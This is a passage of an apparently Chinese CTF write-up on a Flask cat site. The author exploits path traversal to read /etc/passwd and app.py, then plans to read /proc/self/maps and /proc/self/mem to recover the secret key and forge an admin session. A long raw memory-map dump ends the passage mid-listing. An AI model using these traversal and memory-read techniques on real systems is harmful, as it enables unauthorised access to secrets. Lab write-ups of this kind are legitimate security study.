知识点整理
-
文件包含(重要文件):(具体解释见附属图片)
- /etc/passwd
- /proc/self
- /proc/self/maps
- /proc/self/mem
- proc/self/cmdline
- flask_session结构
-
flask框架的敏感文件:app.py
-
flask框架的文件结构:参考文章:Flask Flask应用的常见文件夹/文件结构|极客教程
-
tips:这套题的关键就是flask_session的构造
- flask-session伪造详解:
- 文章中所需的脚本文件都已经打包好放在附属的资源中,需要自取
解题思路
直接进入题目场景:http://223.112.5.141:62579
刚进入场景发现是一个介绍猫的网站
随便点了一下发现了url中出现了file参数,可能存在文件包含漏洞
尝试访问一下flag.txt文件,发现提示没有该文件或者文件不可读
尝试访问一下/etc/passwd文件,发现有回显,存在目录穿越
附上一张文件包含常用的一些重要文件图
接下来我利用目录穿越的漏洞尝试在各个位置搜索flag文件,但是没有任何有价值信息,这里只能给出确定的文件路径,伪协议没办法发挥作用,没什么思路了
那就先扫一下目录吧
这里找到了两个目录,/info和/admin;
/info目录已经看过了,就是文件包含的目录,重点看一下admin目录是什么;抓包看了一下发现返回NONONO信息,这啥也没有啊,到这里是真的没什么思路了
通过插件wappalyzer也没得到什么有用信息
使用潮汐指纹识别了一下得到了中间件的信息Werkzeug/2.2.2;这里我搜索了一下该中间件的历史漏洞,但是没发现对该题有帮助的
ps:知识太匮乏了,没把握住有用的信息(Werkzeug是flask框架的核心模块,所以应该推测出该网站用了flask框架的)
到这里个人的能力已经到极限了,只能求助于大佬的wp了;
https://blog.csdn.net/2302_79800344/article/details/137391400这里大佬的Wappalyzer工具竟然扫出了flask框架,知道了flask框架
我搜了一下flask框架的文件结构:Flask Flask应用的常见文件夹/文件结构|极客教程
比较重要的文件:
– app.py:应用的主入口点,通过运行此文件可以启动应用程序。
– config.py:包含用于配置应用程序的配置参数的文件。在这个文件中,你可以定义数据库的连接字符串、密钥等重要的配置信息。
– requirements.txt:用于记录该应用程序所依赖的所有Python包及其版本号的文件。这样,在其他环境中部署和运行应用程序时,可以轻松地安装所需的包。
尝试通过文件包含访问app.py文件:构造Cat cat
发现返回了文件的内容
返回的内容有点儿乱,需要整理一下
这里我直接将返回内容发送给kimi助手,让他帮我格式化一下,得到了格式化的程序
这里它本身已经处理的挺好了,即使不运行程序也能看明白返回的内容了
import textwrap
# 需要格式化的代码
code_str = '''import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat
flag = ""
app = Flask(
__name__,
static_url_path='/',
static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")
@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])
return render_template("index.html", cats_list=cats_list, cat=cat)
@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
return render_template("detail.html", catname=name, info=cat(filename, start, end))
@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5637)'''
# 使用 textwrap.dedent 去除缩进
formatted_code = textwrap.dedent(code_str)
# 打印格式化后的代码
print(formatted_code)
下面重点分析一下代码
通过分析代码,重点在于构造session使得admin=1
import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat
flag = ""
app = Flask(
__name__,
static_url_path='/',
static_folder='static'
)
//使用uuid生成随机值并去除中间的连接符(最后为32位16进制字符组成)
//结尾再拼接上特定的字符串*abcdefgh构成secret_key的值
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
//如果存在/flag文件,读取内容并赋值给flag变量,之后删除该文件(怪不得我尝试读取/flag却找不到)
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")
@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])
return render_template("index.html", cats_list=cats_list, cat=cat)
//将用户输入的内容拼接到文件路径中作为访问路径导致目录穿越(未判别)
@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
return render_template("detail.html", catname=name, info=cat(filename, start, end))
//重点来了;通过GET方法获取session中的admin变量的值,如果是1返回flag,如果是0则返回NONONO
@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5637)这里就需要进行flask_session构造了,但是还需要搞定一下secret_key的值
这就需要用到/proc/self/maps和/proc/self/mem文件了,通过读取内存是可以找到secret_key的值的;
/proc/self/maps:存储文件和内存映射关系
/proc/self/mem:存储当前内存数据,不能直接访问,需要利用内存映射地址和偏移量进行访问
通过读取/proc/self/maps得到了一堆数据
数据很乱,交给Kimi助手
原始数据
56396bd24000-56396bd25000 r--p 00000000 00:e1 66454247 /usr/local/bin/python3.7\n56396bd25000-56396bd26000 r-xp 00001000 00:e1 66454247 /usr/local/bin/python3.7\n56396bd26000-56396bd27000 r--p 00002000 00:e1 66454247 /usr/local/bin/python3.7\n56396bd27000-56396bd28000 r--p 00002000 00:e1 66454247 /usr/local/bin/python3.7\n56396bd28000-56396bd29000 rw-p 00003000 00:e1 66454247 /usr/local/bin/python3.7\n56396e277000-56396e278000 ---p 00000000 00:00 0 [heap]\n56396e278000-56396e27c000 rw-p 00000000 00:00 0 [heap]\n7fa8a1522000-7fa8a1562000 rw-p 00000000 00:00 0 \n7fa8a1608000-7fa8a165a000 rw-p 00000000 00:00 0 \n7fa8a1661000-7fa8a1665000 rw-p 00000000 00:00 0 \n7fa8a1665000-7fa8a1667000 ---p 00000000 00:00 0 \n7fa8a1667000-7fa8a1770000 rw-p 00000000 00:00 0 \n7fa8a1771000-7fa8a1784000 rw-p 00000000 00:00 0 \n7fa8a1787000-7fa8a17db000 rw-p 00000000 00:00 0 \n7fa8a17de000-7fa8a17ee000 rw-p 00000000 00:00 0 \n7fa8a17f1000-7fa8a1923000 rw-p 00000000 00:00 0 \n7fa8a1927000-7fa8a19a7000 rw-p 00000000 00:00 0 \n7fa8a19aa000-7fa8a19ee000 rw-p 00000000 00:00 0 \n7fa8a19ee000-7fa8a19f0000 r--p 00000000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fa8a19f0000-7fa8a19f2000 r-xp 00002000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fa8a19f2000-7fa8a19f3000 r--p 00004000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fa8a19f3000-7fa8a19f4000 r--p 00004000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fa8a19f4000-7fa8a19f5000 rw-p 00005000 00:e1 66454913 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fa8a19f5000-7fa8a1a01000 rw-p 00000000 00:00 0 \n7fa8a1a04000-7fa8a1af8000 rw-p 00000000 00:00 0 \n7fa8a1af9000-7fa8a1b6b000 rw-p 00000000 00:00 0 \n7fa8a1b6b000-7fa8a1b71000 r--p 00000000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fa8a1b71000-7fa8a1ba8000 r-xp 00006000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fa8a1ba8000-7fa8a1bb4000 r--p 0003d000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fa8a1bb4000-7fa8a1bb5000 r--p 00048000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fa8a1bb5000-7fa8a1bbd000 rw-p 00049000 00:e1 66454900 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fa8a1bbd000-7fa8a1c48000 rw-p 00000000 00:00 0 \n7fa8a1c48000-7fa8a1c96000 rw-p 00000000 00:00 0 \n7fa8a1c96000-7fa8a1c99000 r--p 00000000 00:e1 66454949 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fa8a1c99000-7fa8a1c9d000 r-xp 00003000 00:e1 66454949 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fa8a1c9d000-7fa8a1d7e000 r--p 00007000 00:e1 66454949 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fa8a1d7e000-7fa8a1d7f000 r--p 000e7000 00:e1 66454949 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fa8a1d7f000-7fa8a1d9c000 rw-p 000e8000 00:e1 66454949 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fa8a1d9c000-7fa8a1da8000 rw-p 00000000 00:00 0 \n7fa8a1da9000-7fa8a1e39000 rw-p 00000000 00:00 0 \n7fa8a1e3a000-7fa8a1f66000 rw-p 00000000 00:00 0 \n7fa8a1f66000-7fa8a1f82000 r--p 00000000 00:e1 66329003 /lib/libssl.so.1.1\n7fa8a1f82000-7fa8a1fc2000 r-xp 0001c000 00:e1 66329003 /lib/libssl.so.1.1\n7fa8a1fc2000-7fa8a1fda000 r--p 0005c000 00:e1 66329003 /lib/libssl.so.1.1\n7fa8a1fda000-7fa8a1fe3000 r--p 00073000 00:e1 66329003 /lib/libssl.so.1.1\n7fa8a1fe3000-7fa8a1fe7000 rw-p 0007c000 00:e1 66329003 /lib/libssl.so.1.1\n7fa8a1fe7000-7fa8a21b8000 rw-p 00000000 00:00 0 \n7fa8a21b9000-7fa8a2236000 rw-p 00000000 00:00 0 \n7fa8a2237000-7fa8a224a000 rw-p 00000000 00:00 0 \n7fa8a224a000-7fa8a224c000 r--p 00000000 00:e1 66454933 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fa8a224c000-7fa8a2250000 r-xp 00002000 00:e1 66454933 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fa8a2250000-7fa8a2252000 r--p 00006000 00:e1 66454933 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fa8a2252000-7fa8a2253000 r--p 00007000 00:e1 66454933 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fa8a2253000-7fa8a2254000 rw-p 00008000 00:e1 66454933 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fa8a2254000-7fa8a2259000 rw-p 00000000 00:00 0 \n7fa8a2259000-7fa8a225e000 r--p 00000000 00:e1 66454898 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fa8a225e000-7fa8a2269000 r-xp 00005000 00:e1 66454898 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fa8a2269000-7fa8a226e000 r--p 00010000 00:e1 66454898 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fa8a226e000-7fa8a226f000 r--p 00014000 00:e1 66454898 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fa8a226f000-7fa8a2271000 rw-p 00015000 00:e1 66454898 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fa8a2271000-7fa8a22df000 rw-p 00000000 00:00 0 \n7fa8a22df000-7fa8a22e1000 r--p 00000000 00:e1 66454945 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fa8a22e1000-7fa8a22e5000 r-xp 00002000 00:e1 66454945 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fa8a22e5000-7fa8a22e6000 r--p 00006000 00:e1 66454945 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fa8a22e6000-7fa8a22e7000 r--p 00006000 00:e1 66454945 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fa8a22e7000-7fa8a22e9000 rw-p 00007000 00:e1 66454945 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fa8a22e9000-7fa8a22f3000 rw-p 00000000 00:00 0 \n7fa8a22f3000-7fa8a22f7000 r--p 00000000 00:e1 66454920 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fa8a22f7000-7fa8a2300000 r-xp 00004000 00:e1 66454920 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fa8a2300000-7fa8a2304000 r--p 0000d000 00:e1 66454920 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fa8a2304000-7fa8a2305000 r--p 00011000 00:e1 66454920 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fa8a2305000-7fa8a2306000 r--p 00011000 00:e1 66454920 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fa8a2306000-7fa8a230b000 rw-p 00012000 00:e1 66454920 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fa8a230b000-7fa8a2310000 rw-p 00000000 00:00 0 \n7fa8a2311000-7fa8a231a000 rw-p 00000000 00:00 0 \n7fa8a231a000-7fa8a231b000 r--p 00000000 00:e1 66454891 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fa8a231b000-7fa8a231c000 r-xp 00001000 00:e1 66454891 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fa8a231c000-7fa8a231d000 r--p 00002000 00:e1 66454891 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fa8a231d000-7fa8a231e000 r--p 00002000 00:e1 66454891 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fa8a231e000-7fa8a231f000 rw-p 00003000 00:e1 66454891 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fa8a231f000-7fa8a239f000 rw-p 00000000 00:00 0 \n7fa8a23a0000-7fa8a23f8000 rw-p 00000000 00:00 0 \n7fa8a23f9000-7fa8a258d000 rw-p 00000000 00:00 0 \n7fa8a258d000-7fa8a258e000 r--p 00000000 00:e1 66454911 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fa8a258e000-7fa8a258f000 r-xp 00001000 00:e1 66454911 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fa8a258f000-7fa8a2590000 r--p 00002000 00:e1 66454911 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fa8a2590000-7fa8a2591000 r--p 00002000 00:e1 66454911 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fa8a2591000-7fa8a2592000 rw-p 00003000 00:e1 66454911 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fa8a2592000-7fa8a25e9000 rw-p 00000000 00:00 0 \n7fa8a25e9000-7fa8a25ea000 r--p 00000000 00:e1 66454915 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fa8a25ea000-7fa8a25ed000 r-xp 00001000 00:e1 66454915 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fa8a25ed000-7fa8a25ee000 r--p 00004000 00:e1 66454915 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fa8a25ee000-7fa8a25ef000 r--p 00004000 00:e1 66454915 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fa8a25ef000-7fa8a25f0000 rw-p 00005000 00:e1 66454915 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fa8a25f0000-7fa8a25f1000 r--p 00000000 00:e1 66454882 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fa8a25f1000-7fa8a25f2000 r-xp 00001000 00:e1 66454882 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fa8a25f2000-7fa8a25f3000 r--p 00002000 00:e1 66454882 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fa8a25f3000-7fa8a25f4000 r--p 00002000 00:e1 66454882 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fa8a25f4000-7fa8a25f5000 rw-p 00003000 00:e1 66454882 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fa8a25f5000-7fa8a25f7000 r--p 00000000 00:e1 66454918 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fa8a25f7000-7fa8a260b000 r-xp 00002000 00:e1 66454918 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fa8a260b000-7fa8a260c000 r--p 00016000 00:e1 66454918 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fa8a260c000-7fa8a260d000 r--p 00017000 00:e1 66454918 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fa8a260d000-7fa8a260e000 r--p 00017000 00:e1 66454918 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fa8a260e000-7fa8a2610000 rw-p 00018000 00:e1 66454918 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fa8a2610000-7fa8a2612000 r--p 00000000 00:e1 66454883 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fa8a2612000-7fa8a2619000 r-xp 00002000 00:e1 66454883 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fa8a2619000-7fa8a261a000 r--p 00009000 00:e1 66454883 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fa8a261a000-7fa8a261b000 r--p 0000a000 00:e1 66454883 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fa8a261b000-7fa8a261c000 r--p 0000a000 00:e1 66454883 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fa8a261c000-7fa8a261d000 rw-p 0000b000 00:e1 66454883 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fa8a261d000-7fa8a2692000 r--p 00000000 00:e1 66329002 /lib/libcrypto.so.1.1\n7fa8a2692000-7fa8a27e9000 r-xp 00075000 00:e1 66329002 /lib/libcrypto.so.1.1\n7fa8a27e9000-7fa8a286d000 r--p 001cc000 00:e1 66329002 /lib/libcrypto.so.1.1\n7fa8a286d000-7fa8a2898000 r--p 0024f000 00:e1 66329002 /lib/libcrypto.so.1.1\n7fa8a2898000-7fa8a289a000 rw-p 0027a000 00:e1 66329002 /lib/libcrypto.so.1.1\n7fa8a289a000-7fa8a289e000 rw-p 00000000 00:00 0 \n7fa8a289e000-7fa8a28a0000 r--p 00000000 00:e1 66454903 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a28a0000-7fa8a28a4000 r-xp 00002000 00:e1 66454903 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a28a4000-7fa8a28a5000 r--p 00006000 00:e1 66454903 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a28a5000-7fa8a28a6000 r--p 00007000 00:e1 66454903 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a28a6000-7fa8a28a7000 r--p 00007000 00:e1 66454903 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a28a7000-7fa8a28a8000 rw-p 00008000 00:e1 66454903 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a28a8000-7fa8a28ab000 r--p 00000000 00:e1 66454937 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fa8a28ab000-7fa8a28b3000 r-xp 00003000 00:e1 66454937 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fa8a28b3000-7fa8a28b5000 r--p 0000b000 00:e1 66454937 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fa8a28b5000-7fa8a28b6000 r--p 0000c000 00:e1 66454937 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fa8a28b6000-7fa8a28b8000 rw-p 0000d000 00:e1 66454937 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fa8a28b8000-7fa8a28bb000 r--p 00000000 00:e1 66454220 /usr/lib/liblzma.so.5.2.5\n7fa8a28bb000-7fa8a28ce000 r-xp 00003000 00:e1 66454220 /usr/lib/liblzma.so.5.2.5\n7fa8a28ce000-7fa8a28d9000 r--p 00016000 00:e1 66454220 /usr/lib/liblzma.so.5.2.5\n7fa8a28d9000-7fa8a28da000 r--p 00020000 00:e1 66454220 /usr/lib/liblzma.so.5.2.5\n7fa8a28da000-7fa8a28db000 rw-p 00021000 00:e1 66454220 /usr/lib/liblzma.so.5.2.5\n7fa8a28db000-7fa8a28dd000 r--p 00000000 00:e1 66454186 /usr/lib/libbz2.so.1.0.8\n7fa8a28dd000-7fa8a28e6000 r-xp 00002000 00:e1 66454186 /usr/lib/libbz2.so.1.0.8\n7fa8a28e6000-7fa8a28e8000 r--p 0000b000 00:e1 66454186 /usr/lib/libbz2.so.1.0.8\n7fa8a28e8000-7fa8a28e9000 r--p 0000c000 00:e1 66454186 /usr/lib/libbz2.so.1.0.8\n7fa8a28e9000-7fa8a28ea000 rw-p 0000d000 00:e1 66454186 /usr/lib/libbz2.so.1.0.8\n7fa8a28ea000-7fa8a292a000 rw-p 00000000 00:00 0 \n7fa8a292b000-7fa8a294e000 rw-p 00000000 00:00 0 \n7fa8a294e000-7fa8a2954000 rw-p 00000000 00:00 0 \n7fa8a2954000-7fa8a295d000 r--p 00000000 00:e1 66454922 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fa8a295d000-7fa8a2966000 r-xp 00009000 00:e1 66454922 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fa8a2966000-7fa8a296c000 r--p 00012000 00:e1 66454922 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fa8a296c000-7fa8a296d000 r--p 00018000 00:e1 66454922 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fa8a296d000-7fa8a296e000 r--p 00018000 00:e1 66454922 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fa8a296e000-7fa8a2973000 rw-p 00019000 00:e1 66454922 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fa8a2973000-7fa8a2977000 rw-p 00000000 00:00 0 \n7fa8a2977000-7fa8a2978000 r--p 00000000 00:e1 66454936 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fa8a2978000-7fa8a2979000 r-xp 00001000 00:e1 66454936 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fa8a2979000-7fa8a297a000 r--p 00002000 00:e1 66454936 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fa8a297a000-7fa8a297b000 r--p 00002000 00:e1 66454936 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fa8a297b000-7fa8a297c000 rw-p 00003000 00:e1 66454936 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fa8a297c000-7fa8a29c9000 rw-p 00000000 00:00 0 \n7fa8a29c9000-7fa8a29cc000 r--p 00000000 00:e1 66329005 /lib/libz.so.1.2.11\n7fa8a29cc000-7fa8a29da000 r-xp 00003000 00:e1 66329005 /lib/libz.so.1.2.11\n7fa8a29da000-7fa8a29e1000 r--p 00011000 00:e1 66329005 /lib/libz.so.1.2.11\n7fa8a29e1000-7fa8a29e2000 r--p 00017000 00:e1 66329005 /lib/libz.so.1.2.11\n7fa8a29e2000-7fa8a29e3000 rw-p 00018000 00:e1 66329005 /lib/libz.so.1.2.11\n7fa8a29e3000-7fa8a29e5000 r--p 00000000 00:e1 66454951 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a29e5000-7fa8a29e8000 r-xp 00002000 00:e1 66454951 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a29e8000-7fa8a29e9000 r--p 00005000 00:e1 66454951 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a29e9000-7fa8a29ea000 r--p 00006000 00:e1 66454951 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a29ea000-7fa8a29eb000 r--p 00006000 00:e1 66454951 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a29eb000-7fa8a29ed000 rw-p 00007000 00:e1 66454951 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fa8a29ed000-7fa8a29f1000 r--p 00000000 00:e1 66454912 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fa8a29f1000-7fa8a2a06000 r-xp 00004000 00:e1 66454912 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a06000-7fa8a2a0a000 r--p 00019000 00:e1 66454912 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a0a000-7fa8a2a0b000 r--p 0001d000 00:e1 66454912 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a0b000-7fa8a2a0c000 r--p 0001d000 00:e1 66454912 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a0c000-7fa8a2a0f000 rw-p 0001e000 00:e1 66454912 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a0f000-7fa8a2a17000 rw-p 00000000 00:00 0 \n7fa8a2a17000-7fa8a2a1a000 r--p 00000000 00:e1 66454923 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a1a000-7fa8a2a20000 r-xp 00003000 00:e1 66454923 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a20000-7fa8a2a22000 r--p 00009000 00:e1 66454923 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a22000-7fa8a2a23000 r--p 0000b000 00:e1 66454923 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a23000-7fa8a2a24000 r--p 0000b000 00:e1 66454923 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a24000-7fa8a2a26000 rw-p 0000c000 00:e1 66454923 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a26000-7fa8a2a81000 rw-p 00000000 00:00 0 \n7fa8a2a81000-7fa8a2a83000 r--p 00000000 00:e1 66454905 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fa8a2a83000-7fa8a2a8a000 r-xp 00002000 00:e1 